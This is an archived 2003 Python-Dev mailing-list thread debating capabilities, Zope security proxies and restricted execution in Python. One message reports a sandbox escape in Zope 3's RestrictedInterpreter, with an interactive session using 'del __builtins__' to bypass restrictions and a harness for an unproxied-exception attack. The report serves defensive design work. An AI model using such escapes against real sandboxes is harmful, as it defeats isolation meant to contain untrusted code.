don't need anything but the ability to restrict imports and other
unproxied access to sys.modules to use proxies.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 11:41:19 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 06:41:19 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain> <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com> <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com> <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6C79DF.8070809@zope.com>

Guido van Rossum wrote:
> [Jim]
> 
>>You don't need restricted execution to make proxies work.
> 
> 
> Um, I think that's a dangerous mistake, or a confusion in terminology.

All I'm saying is that the proxy mechanism itself doesn't rely on
restricted execution.

> Without restricted execution, untrusted code would have access to
> sys.modules, and from there it would be able to access
> removeAllProxies.

All we need to be able to do is control imports.  It turns out that
to prevent access to sys.modules, we have to replace __builtins__,
which has the side-effect of enabling restricted execution. You
don't need anything but the ability to restrict imports and other
unproxied access to sys.modules to use proxies.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 11:51:22 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 06:51:22 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <05a701c2e66f$6c001be0$6d94fea9@newmexico>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico>
Message-ID: <3E6C7C3A.2090104@zope.com>

Samuele Pedroni wrote:
> From: "Samuele Pedroni" <pedronis@bluewin.ch>
> 
>>From: "Jim Fulton" <jim@zope.com>
>>
>>>For example, you can't proxy exceptions without
>>>breaking exception handling. In Zope, we rely on restricted execution to
>>
>>prevent
>>
>>>certian kinds of introspection on exceptions and exception classes.  In
> 
> Zope,
> 
>>we
>>
>>>also don't proxy None, because None is usually checked for identity. We
> 
> also
> 
>>don't
>>
>>>proxy strings, and numbers.
>>>
>>
>>That was a question I was asking myself about proxies: exception handling.
>>But I never had the time to play with it to check.
>>
>>Does that mean that restricted code can get unproxied instances of classic
>>classes as caught exceptions?
> 
> 
> maybe the question was unclear,

I think it was clear.

 > but it was serious, what I was asking is
> whether some restricted code can do:
> 
> try:
>   deliberate code to force exception
> except Exception,e:
>  ...
> 
> so that e is caught unproxied.

Right. e is caught unproxied.


 > Looking at zope/security/_proxy.c it seems this
> can be the case...

Yes,

> then to be (likely) on the safe side, all exception class definitions for
> possible e classes: like e.g.
> 
> class MyExc(Exception):
>     ...
> 
> 
> ought to be executed _in restricted mode_, or be "trivial/empty": something
> like
> 
> class MyExc(Exception):
>     def __init__(self, msg):
>         self.message = msg
>         Exception.__init__(self, msg)
> 
>     def __str__(self):
>         return self.message
>
> is already too much rope.

I'm not sure if you are saying that this examples is "trivial/empty"
or not.  It seems that yuo are saying that it is not trvial enough.
If so, why?


> Although it seems not to have the "nice" two-level-of-calls behavior of Bastion
> instances, an unproxied instance of MyExc if MyExc was defined outside of
> restricted execution, can be used to break out of restricted execution.

How can it be used to break out of restricted execution?

I see three risks:

   1. The exception provides methods to do harmful things,
      such as create side effects or provide access to data outside
      the exception.

   2. The exception creates data that needs to be protected.  For example
      Zope uses a NotFoundError exception taht contains an object being searched.

   3. The exception methods meta data provide access to module globals.

Risk 1 needs to be mitigated through proper exception design. Exceptions
need to be limited in what their methods do.  This is a bit brittle, but
all standard exceptions have this property.

Risk 2 is mitigated by proxying exception instance data.  Proxies can do this.
This is what we've decided to do, although we haven't implemented it yet.

Risk 3 is mitigated by restricted execution.

Have I missed anything?

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 12:23:08 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 07:23:08 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <3E6C83AC.7070100@zope.com>

Ka-Ping Yee wrote:
> Ben Laurie wrote:
> 
>>BTW, if you would like to explain why you don't think bound methods are
>>the way to go on python-dev, I'd love to hear it.
> 
> 
> Guido van Rossum wrote:
> 
>>Using capabilities, I would have to hand her
>>a bunch of capabilities for various methods: __getitem__, has_key,
>>get, keys, items, values, and many more.  Using proxies I can simply
>>give her a read-only proxy for the object.  So proxies are more
>>powerful.

I'm pretty sure that Guido meant to say "bound method" rather than
"capability" in the text above.  I think that the debate is partly
whether to express capabilities (or some other scheme) in terms of
bound methods or proxies, which expose entire interfaces.

> There seems to be a persistent confusion here that i would like
> to dispel: a capability is not a single lambda.

There are a bunch of confusions floating around. :)
A major one is a concise definition os what a capability and
why the capability approach is good or bad.

In reading about capabilities in E, http://www.erights.org/.
I really need to read all that stuff again.  Of course,
as others pointed out, I ended up creating something for Zope 3
that isn't capabilities.  I think you touch on a reason below.


> Guido's paragraph, above, seems to believe that it is.  In fact,
> the pattern he described is a common and powerful way of using
> capabilities.  A capability is just an unforgeable object reference.
> In a pure capability system, the only thing you can do with a
> capability is to call methods on it (or, if you prefer, all you
> can do is send messages to it).  Interposing an object to expose
> only a subset of another object's API, such as a read-only subset,
> is exactly the power capabilities give you.
> 
> It seems to me that the "rexec vs. proxy" debate is really about
> a very different question: How do we get from Python's currently
> promiscuous objects to properly restricted objects?
> 
> (Once we have properly restricted objects in either fashion, yes,
> definitely, using proxies to restrict access is a great technique.)
> 
> If i understand correctly, the "proxy" answer is "we create a
> special wrapper object, then the programmer has to individually
> wrap any object they want to be secure".  And the "rexec" answer
> is "we create an interpreter mode in which all objects are secure".
> 
> I think the latter is far better.  To have any sort of real chance
> at establishing security, you have to start from a place where
> everything is secure, instead of starting from a place where
> everything is insecure and you have to individually secure every
> single object with its own wrapper.
 >
> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.
> Anyone wanting to do introspection would simply have to obtain
> the "introspect" capability from a privileged place (e.g. sys).
> For example,
> 
>     class Foo:
>         pass
> 
>     print Foo.__dict__                  # fails
> 
>     from sys import introspect
>     print introspect(Foo).__dict__      # succeeds
> 
> When running the interpreter in secure mode, "introspect"
> would just be missing from the sys module (again, ideally
> sys.introspect wouldn't exist by default, and a command-line
> option would turn it on, but i realize that's far away).
> 
> This would have the effect of the "introspectable flag" that
> Guido mentioned, but without expending any storage at all,
> until you actually needed to introspect something.

You seem to be arguing that programmers should not have to
explictly create capabilities, but that everythink should be a capability
by default.  Please correct me if I'm wrong.

I thought that the main point of capabilities was that programmers
*should* explictly bother to pass capabilities.  Programmers should
think about arguments passed to (or returned or raised to) other code as
capabilities to do things and pass *just* the capabilities needed.
I find a lot of appeal in this idea.

Zope employs proxies in a way that falls somewhere between the extremes of
capabilities and implicitly protecting everything.

(I'm going to be a little sloppy hear for brevity. A Zope proxy is made up
of two objects, a simple proxy that *could* be used to implement capabilities
and a checker that provides policy. The policy we currently use in Zope is
not a capability policy.)

Zope security proxies assure that "everything" is proxied. (We choose not
to proxy simple valies like numbers, strings, and None.) Values returned
from operations on proxied. This maked it pretty straightforward to set up
execution environments where untrusted code only has access to proxies. In addition,
if untrusted code calls trusted code, the untrusted code can only pass proxies.
This means that trusted code can't be tricked into performing operations that
the untrusted code could not perform.  Zope proxies achiev this level of automation
by providing registries, mostly based on classes, that allow programmers to say
how different kinds of objects should be proxied. Programmers decide what capabilities
to expose at "compile" time (really program startup) rather than run time.
Programmers *can* create proxies explicitly that provides non-default access.
In fact, there are apis that actually provide the the equivalent of capabilities.

I mention all of this because I think it's worth thinking/debating this issue
about how explicit security should be. On the one hand, explictly giving *just*
the capabilities needed for a task seems very appealing. OTOH, making sure
that everything is protected by default is safer.  I suspect that there
are ways to combine (trade off?) these in reasonable ways.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From ben@algroup.co.uk  Mon Mar 10 14:03:28 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 10 Mar 2003 14:03:28 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
Message-ID: <3E6C9B30.8030901@algroup.co.uk>

Ka-Ping Yee wrote:
> On Sat, 8 Mar 2003, Ben Laurie wrote:
> 
>>>>c) Wrap or replace some of the existing libraries, certify that others
>>>>are "safe"
>>>
>>>This should only be necessary for (core and 3rd party) extension
>>>modules.  The rexec module has a framework for this.
>>>
>>>
>>>>It looks to me like a and b are shared with proxies, and c would be
>>>>different, by definition. Is there anything else? Am I on the wrong track?
>>>
>>>I don't know why you think (c) is different.
>>
>>Because with proxies you'd wrap with proxies, and with capabilities
>>you'd wrap with capabilities. Or do you think there's a way that would
>>work for both (which would, of course, be great)?
> 
> 
> This doesn't make any sense to me.  The standard libraries would provide
> proxy wrappers in either caes.  The rexec vs. proxy issue doesn't enter
> into it.

We've got too much overloading here! I meant "proxy" as in "Zope proxy". 
Yes, in either case they'll be wrapped in some kind of (non-Zope) proxy, 
but the actual wrapper would be different.

> By the way -- to avoid confusion between "proxies used to wrap
> unrestricted objects in order to make them into secure objects" and
> "proxies used to reduce the interface of an existing secure object",
> let's call the first "proxy" (as has been used in the "rexec vs. proxy"
> discussion so far), and call the second a "facet" (which is the term
> commonly used when capabilities people talk about reducing an interface).
> We often talk about providing, say, a "read-only facet" on an object.

This would be more applicable to an object-based capability model, which 
Jim and Guido seem to favour.

In fact, perhaps it would be nicest to be able to do both - i.e. bound 
methods _and_ opaque objects.

Then we'd all be happy.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From pedronis@bluewin.ch  Mon Mar 10 14:18:43 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 15:18:43 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico> <3E6C7C3A.2090104@zope.com>
Message-ID: <008001c2e70f$f514c520$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
> How can it be used to break out of restricted execution?
>
> I see three risks:
>
>    1. The exception provides methods to do harmful things,
>       such as create side effects or provide access to data outside
>       the exception.
>
>    2. The exception creates data that needs to be protected.  For example
>       Zope uses a NotFoundError exception taht contains an object being
searched.
>
>    3. The exception methods meta data provide access to module globals.
>
> Risk 1 needs to be mitigated through proper exception design. Exceptions
> need to be limited in what their methods do.  This is a bit brittle, but
> all standard exceptions have this property.
>
> Risk 2 is mitigated by proxying exception instance data.  Proxies can do
this.
> This is what we've decided to do, although we haven't implemented it yet.
>
> Risk 3 is mitigated by restricted execution.
>
> Have I missed anything?

OK, I have had the time to really try what I was thinking about. I have not
found a way to really break out from restricted execution
(does not mean I'm sure there isn't) BUT:

I'm considering:
- Python 2.2.2
- Zope 3 3.0a1 and
  zope.security.interpreter.RestrictedInterpreter
  with zope.security.simplepolicies.ParanoidSecurityPolicy (the default)

so

1. a bug (rexec had it too). If I remember correctly the solution is
re-injecting __builtins__ before each exec

C:\transit\Zope3-3.0a1\src\zope\security>\usr\python22\python
Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.path.append('..\..')
>>> from zope.security.interpreter import RestrictedInterpreter
>>> ri=RestrictedInterpreter()
>>> ri.ri_exec("class A: pass")
>>> ri.ri_exec("print A.__dict__")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "..\..\zope\security\interpreter.py", line 32, in ri_exec
    exec code in self.globals
  File "<string>", line 1, in ?
RuntimeError: class.__dict__ not accessible in restricted mode
>>> ri.ri_exec("del __builtins__")
>>> ri.ri_exec("print A.__dict__")
{'__module__': '__builtin__', '__doc__': None}

or be sure to call ri_exec only once on each RestrictedInterpreter instance.

Assuming that fixed:

2. If code executed under a RestrictedInterpreter could obtain a MyExc instance
and had a working unproxied/non-proxying 'property' built-in, it could very
likely break out from restricted execution. Fortunately the 'property' passed
to such code is not working. Given that that's not the case I skip the
illustration.

3.  How much this scenario is likely really depend on how RestrictedInterpreter
is used, how and where exceptions are defined, if really restricted code can
manage to get an instance of one of them ... if further restrictions e.g. on
subclassing are added or removed ... if the general situation of restricted
execution and new-style classes improve. All of this I don't know.

Here I consider: a "dangerous" function ('sys.exit') is imported in the same
module where MyExc is defined, MyExc is not defined under restricted execution,
a proxied function is passed to restricted code such that it can capture an
instance of MyExc (as I said whether this set of things is likely/unlikely I
don't know):

<s.py>
import sys

from sys import exit # !!! same module as MyExc

sys.path.append('C:/transit/Zope3-3.0a1/src')

from zope.security.interpreter import RestrictedInterpreter
from zope.security.checker import ProxyFactory

class MyExc(Exception): # !!! definition outside of resticted execution
  def __init__(self,msg):
    self.message = msg
    Exception.__init__(self,msg)

  def __str__(self):
    return self.message

def myfunc():
  raise MyExc('foo')

ri = RestrictedInterpreter()

ri.globals['myfunc'] = ProxyFactory(myfunc)

f = open('c:/Documenti/x.txt','r')
code = f.read()
f.close()

ri.ri_exec(code)

print "OK"
</s.py>

Anyway I have a _very baroque_ x.txt that  manages to call sys.exit.

regards


From jim@zope.com  Mon Mar 10 15:29:41 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 10:29:41 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
Message-ID: <3E6CAF65.4040505@zope.com>

Greg Ewing wrote:
>>E.g. I might have a service configuration registry object.  The object
>>behaves roughly like a dictionary.  A certain user may be given
>>read-only access to the registry.
> 
> 
> Maybe every Python object should have a flag which
> can be set to prevent introspection -- like the current
> restricted execution mechanism, but on a per-object
> basis. Then any object could be used as a capability.

Yes, but not a very useful one.  For example, given a file,
you often want to create a "file read" capability which is
an object that allows reading the file but not writing the file.
Just preventing introspection isn't enough.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From ben@algroup.co.uk  Mon Mar 10 15:30:13 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 10 Mar 2003 15:30:13 +0000
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <3E6CAF85.30300@algroup.co.uk>

Ka-Ping Yee wrote:
> Ben Laurie wrote:
> 
>>BTW, if you would like to explain why you don't think bound methods are
>>the way to go on python-dev, I'd love to hear it.
> 
> 
> Guido van Rossum wrote:
> 
>>Using capabilities, I would have to hand her
>>a bunch of capabilities for various methods: __getitem__, has_key,
>>get, keys, items, values, and many more.  Using proxies I can simply
>>give her a read-only proxy for the object.  So proxies are more
>>powerful.
> 
> 
> There seems to be a persistent confusion here that i would like
> to dispel: a capability is not a single lambda.
> 
> Guido's paragraph, above, seems to believe that it is.  In fact,
> the pattern he described is a common and powerful way of using
> capabilities.  A capability is just an unforgeable object reference.
> In a pure capability system, the only thing you can do with a
> capability is to call methods on it (or, if you prefer, all you
> can do is send messages to it).  Interposing an object to expose
> only a subset of another object's API, such as a read-only subset,
> is exactly the power capabilities give you.

I think this is an implementation detail, as I have mentioned before. A 
capability is a thing with certain properties, as discussed ad nauseam. 
You can implement them using bound methods or using opaque objects. 
Personally, I'd like to do both, but if I had to choose, I'd use bound 
methods.

Yes, this probably is a shift in position - I'm still trying to figure 
this stuff out, is my excuse!

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Mon Mar 10 15:38:28 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:38:28 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 04:51:40 CST."
 <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <200303101538.h2AFcTR12087@odiug.zope.com>

> Ben Laurie wrote:
> > BTW, if you would like to explain why you don't think bound methods are
> > the way to go on python-dev, I'd love to hear it.
> 
> Guido van Rossum wrote:
> > Using capabilities, I would have to hand her
> > a bunch of capabilities for various methods: __getitem__, has_key,
> > get, keys, items, values, and many more.  Using proxies I can simply
> > give her a read-only proxy for the object.  So proxies are more
> > powerful.

(Jim surmised that I meant to write "bound methods".  Alas, I don't
get off that easily: at the time I wrote that I really did think that
a capability had to be a single function.)

[Ping]
> There seems to be a persistent confusion here that i would like
> to dispel: a capability is not a single lambda.

I guess, I misunderstood..  I was sure that Ben told me this was so.
Apparently I misread, or you have a different definition of capability
than he does (wouldn't be the first time.)

> Guido's paragraph, above, seems to believe that it is.  In fact,
> the pattern he described is a common and powerful way of using
> capabilities.  A capability is just an unforgeable object reference.
> In a pure capability system, the only thing you can do with a
> capability is to call methods on it (or, if you prefer, all you
> can do is send messages to it).  Interposing an object to expose
> only a subset of another object's API, such as a read-only subset,
> is exactly the power capabilities give you.

So a proxy with a fixed (not depending on the caller) policy about
which methods you can should be considered as equivalent to a
capability -- in fact this would be a way to implement capabilities.

> It seems to me that the "rexec vs. proxy" debate is really about
> a very different question: How do we get from Python's currently
> promiscuous objects to properly restricted objects?
> 
> (Once we have properly restricted objects in either fashion, yes,
> definitely, using proxies to restrict access is a great technique.)
> 
> If i understand correctly, the "proxy" answer is "we create a
> special wrapper object, then the programmer has to individually
> wrap any object they want to be secure".  And the "rexec" answer
> is "we create an interpreter mode in which all objects are secure".

Well, actually, restricted execution as currently implemented does
*not* strive to make all objects secure: untrusted code can still
inspect all attributes of an object unless that object is proxied by a
Bastion, or unless that object is one of a few built-in types
(e.g. bound methods) for which some attributes are privatized.

> I think the latter is far better.  To have any sort of real chance
> at establishing security, you have to start from a place where
> everything is secure, instead of starting from a place where
> everything is insecure and you have to individually secure every
> single object with its own wrapper.

But we don't have the latter.

> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.

That wouldn't be Python.

> Anyone wanting to do introspection would simply have to obtain
> the "introspect" capability from a privileged place (e.g. sys).
> For example,
> 
>     class Foo:
>         pass
> 
>     print Foo.__dict__                  # fails
> 
>     from sys import introspect
>     print introspect(Foo).__dict__      # succeeds
> 
> When running the interpreter in secure mode, "introspect"
> would just be missing from the sys module (again, ideally
> sys.introspect wouldn't exist by default, and a command-line
> option would turn it on, but i realize that's far away).
> 
> This would have the effect of the "introspectable flag" that
> Guido mentioned, but without expending any storage at all,
> until you actually needed to introspect something.

That flag wasn't my idea, it was some one else's (Greg Ewing?).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jim@zope.com  Mon Mar 10 15:34:38 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 10:34:38 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <3E6CB08E.4030905@zope.com>

Jeremy Hylton wrote:

...

> I think both techniques achieve the same end, but with different
> limitations.  I prefer the proxy approach because it is more self
> contained.  The rexec approach requires that all developers working in
> the core on introspection features be aware of security issues.  The
> security kernel ends up being most of the core interpreter -- anything
> that can introspection on objects.

I think that there is an important corrolary. Changes to the security
policy are very hard to make.  For example, if we change our mind about
what should be safe or not: we have many places to make the change, we
have lot's of tests to redo. people have to reinstall or rebuild Python
to get the change. With proxies, the update is provides as fairly small
and self-contained library update.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 15:40:08 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 10:40:08 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
Message-ID: <3E6CB1D8.4050108@zope.com>

Ka-Ping Yee wrote:
> On Sun, 9 Mar 2003, Guido van Rossum wrote:
> 
>>- Which attributes are considered introspective?
> 
> 
> Here's a preliminary description of the boundary between "introspective"
> and "restricted", off the top of my head:
> 
>     1.  The only thing you can do with a bound method is to call it
>         (bound methods have no attributes except __doc__).

Well, I see no harm and much usefulness
in allowing __name__, __repr__, and __str__.

>     2.  The following instance attributes are off limits:
>         __class__, __dict__, __module__.
> 
> That might be a reasonable start.

I generally want to be able to get the __class__. This is harmless
in my case, because I get a proxy back.

> However, there is still the problem that the established technique
> for storing instance-specific state in Python is to use globally-
> accessible data attributes instead of a limited scope.  We would
> also need to add a safe (private) place for instances to put state.

I'm don't understand why this is necessary. In general, you want to
restrict what attributes (data, properties, methods, etc.) are accessible
in certain situations. I don't follow what makes data attributes special.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From pedronis@bluewin.ch  Mon Mar 10 15:44:14 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 16:44:14 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
Message-ID: <025c01c2e71b$e7a3cc40$6d94fea9@newmexico>

From: "Ka-Ping Yee" <ping@zesty.ca>
> However, there is still the problem that the established technique
> for storing instance-specific state in Python is to use globally-
> accessible data attributes instead of a limited scope.  We would
> also need to add a safe (private) place for instances to put state.

Indeed, that's the fact that implementations of methods are normal functions
that access the instance attributes like everything else do,
that's why Zope-proxies become necessary (and a bit brittle):

class A:
 def geta(self):
    return self.a # 1

a=A()

a.a # 2

(1) and (2) are using the same operation/execution path.

The other issue, as you wrote, is also that introspection operations are like
normal operations too (and they share the same execution path also):

a.__dict__

vs.

introspect(a).__dict__

The problem is that there is obviously a flexibility/easy-of-use trade-off.
Python is a language that maximizes that and where e.g. introspection feels
easy and natural, OTOH analyzing security become nightmarish.

regards.


From guido@python.org  Mon Mar 10 15:47:53 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:47:53 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 11:02:26 GMT."
 <3E6C70C2.2010104@algroup.co.uk>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz> <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
 <3E6C70C2.2010104@algroup.co.uk>
Message-ID: <200303101548.h2AFm0212138@odiug.zope.com>

[Someone else]
> >>Maybe every Python object should have a flag which
> >>can be set to prevent introspection -- like the current
> >>restricted execution mechanism, but on a per-object
> >>basis. Then any object could be used as a capability.

> Guido van Rossum wrote:
> > I think the capability folks would object to calling it a capability
> > though. :-)

[Ben]
> No, objects are another way to do it, though it seems to me with 
> somewhat less ease - because the most common use of capabilities is to 
> restrict the type of access to objects other objects have, so you'd need 
> to have multiple objects proxying to the "real" one if you do it at the 
> object level.

I'm not sure I understand.  Do you mean that because there may be
several security levels you'd need different capabilities for an
object for each level?  Since there are also several methods, you
end up managing multiple capabilities in either case.

Anyway, Zope security proxies aren't "managed" this way.  The trusted
code doesn't have a set of objects representing capabilities that it
hands out -- a proxy is manufactured freshly on each use.  I wonder if
this might be one cause of repeated misunderstandings?

> If we were going to go this route, I'd like the alternative of _also_ 
> being able to set the flag on a bound method.
> 
> > Two questions:
> > 
> > - Where to store the flag?  It probably would cost 4 bytes per object.
> 
> You can swap space for time by storing it as an attribute, of course.

Not all Python objects have a dict where to store arbitrary
attributes.  And even if they do, that's about the most expensive way
to store a flag.  And you'd have to worry about someone getting a hold
of that dict and deleting the attribute (assuming that the flag
defaults to allow introspection, otherwise no Python code written
today would continue to work).

> > - Which attributes are considered introspective?
> 
> All of them, except methods.

That's not very Pythonic.

> Of course, this is what my first approximation to capabilities did 
> (that's what a "capclass" was).

I never knew what a capclass was.  I don't think you ever explained
it so clearly ("doesn't allow access to non-method attributes")
before.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 15:53:14 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:53:14 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 05:14:24 CST."
 <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
Message-ID: <200303101553.h2AFrE312165@odiug.zope.com>

> On Sun, 9 Mar 2003, Guido van Rossum wrote:
> > - Which attributes are considered introspective?
> 
> Here's a preliminary description of the boundary between "introspective"
> and "restricted", off the top of my head:
> 
>     1.  The only thing you can do with a bound method is to call it
>         (bound methods have no attributes except __doc__).

Plus __repr__ and __str__.  And if they have attributes at all they
have __getattribute__.  And if they are callable they have __call__.

>     2.  The following instance attributes are off limits:
>         __class__, __dict__, __module__.
> 
> That might be a reasonable start.

Not sure.  Classic rexec disallowed these (and a few more), but the
problem with disallowing __dict__ of an instance was that this made it
impossible for untrusted code to use certain coding patterns like
overriding __setattr__.

> However, there is still the problem that the established technique
> for storing instance-specific state in Python is to use globally-
> accessible data attributes instead of a limited scope.  We would
> also need to add a safe (private) place for instances to put state.

I wonder if we could write special descriptors for this?  The problem
as I see it is that the interpreter doesn't keep track of whether a
particular function is part of a class definition or not, so there's
no way to tell whether it should have access to private data or not.

Proxies get around this, but with the stated disadvantages.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 15:40:30 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:40:30 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 04:55:42 CST."
 <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
Message-ID: <200303101540.h2AFeW012107@odiug.zope.com>

[Ping]
> By the way -- to avoid confusion between "proxies used to wrap
> unrestricted objects in order to make them into secure objects" and
> "proxies used to reduce the interface of an existing secure object",
> let's call the first "proxy" (as has been used in the "rexec vs. proxy"
> discussion so far), and call the second a "facet" (which is the term
> commonly used when capabilities people talk about reducing an interface).
> We often talk about providing, say, a "read-only facet" on an object.

Hm, I'm not sure I understand the difference between the two
definitions you give.  What does "making something into a secure
object" mean if not "reducing its interface"?  And what is the
fundamental difference between a secure object and an insecure one?
In my world view there's a gradual difference.  The only truly secure
object is None. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 16:12:37 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 11:12:37 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: Your message of "Mon, 10 Mar 2003 06:31:16 EST."
 <3E6C7784.5060103@zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain> <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com> <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com> <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
 <3E6C7784.5060103@zope.com>
Message-ID: <200303101612.h2AGCdV12210@odiug.zope.com>

[Jim]
> > >You don't need restricted execution to make proxies work.

[Guido]
> > Um, I think that's a dangerous mistake, or a confusion in terminology.

[Jim]
> All I'm saying is that the proxy mechanism itself doesn't rely on
> restricted execution.
> 
> > Without restricted execution, untrusted code would have access to
> > sys.modules, and from there it would be able to access
> > removeAllProxies.
> 
> All we need to be able to do is control imports.  It turns out that
> to prevent access to sys.modules, we have to replace __builtins__,
> which has the side-effect of enabling restricted execution. You
